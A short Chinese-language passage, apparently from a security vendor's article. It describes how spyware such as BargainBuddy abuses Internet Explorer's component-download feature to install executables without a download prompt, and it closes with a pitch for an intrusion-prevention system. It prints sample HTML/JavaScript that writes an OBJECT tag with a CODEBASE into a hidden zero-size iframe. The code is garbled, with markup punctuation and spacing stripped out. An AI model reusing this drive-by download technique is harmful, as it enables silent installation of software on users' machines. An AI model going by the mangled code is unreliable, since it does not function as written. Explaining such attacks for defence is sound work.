利用互联网程序代码下载链接功能

实例4利用“互联网程序代码下载链接”功能间谍软件攻击者会根据Microsoft网站上的知识库文章中贴出的某段样本程序代码来利用“互联网程序代码下载链接”功能。浏览带有此间谍软件的站点时，工作站会在没有文件下载提示的情况下接受恶意下载（就像已签署了安全性一样）。根据浏览器的安全性设定值，“安全警告”并不一定会显示。以下样本程序代码提供一个使用“互联网程序代码下载链接”功能的范例：HTMLHEADTITLEPageofexecutablelinks/TITLE/HEADBODYBR/!--hyperlinkusescentralscriptfunctioncalledlinkit()--AHREF=onclick=returnlinkit('signed-testfile.exe');SIGNEDCLOCK.EXE/ASCRIPT//linkitputsfilenameintoHTMLcontentandspewsitintoiframefunctionlinkit(filename){strpagestart=HTMLHEAD/HEADBODYOBJECTCLASSID=+'CLSID:15589FA1-C456-11CE-BF01-00AA0055595A'CODEBASE=';strpageend='/OBJECT/BODY/HTML;runnerwin.document.open();runnerwin.document.write(strpagestart+filename+strpageend);window.status=Done.;returnfalse;//stophyperlinkandstayonthispage}/SCRIPT!--hiddeniframeusedforinsertinghtmlcontent--IFRAMEID=runnerwinWIDTH=0HEIGHT=0SRC=/?scid=about%3ablank/IFRAMEBR//BODY/HTML以下屏幕抓图将详细说明此程序代码在BargainBuddy间谍软件中的使用：BargainBuddy使用“互联网程序代码下载链接”功能。解决方案：透过对恶意网络流量的精密侦测，IPS可以在这些渗透行为找到进入网络的入口之前将其阻挡。它会对网络上传输的每个联机要求、封包和文件进行扫描，以确定这些是合法的还是恶意的网络流量。若该网络流量与数千个已定义的过滤器中任何一个的阻挡特征相符，则其存取将会被阻挡，间谍软件将永远无法到达用户或连接的系统。